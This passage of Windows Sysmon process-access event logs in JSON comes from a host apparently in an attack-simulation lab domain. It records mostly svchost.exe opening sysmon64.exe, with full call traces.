Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6264,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6265,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6266,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6267,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6268,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6269,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6270,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6271,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
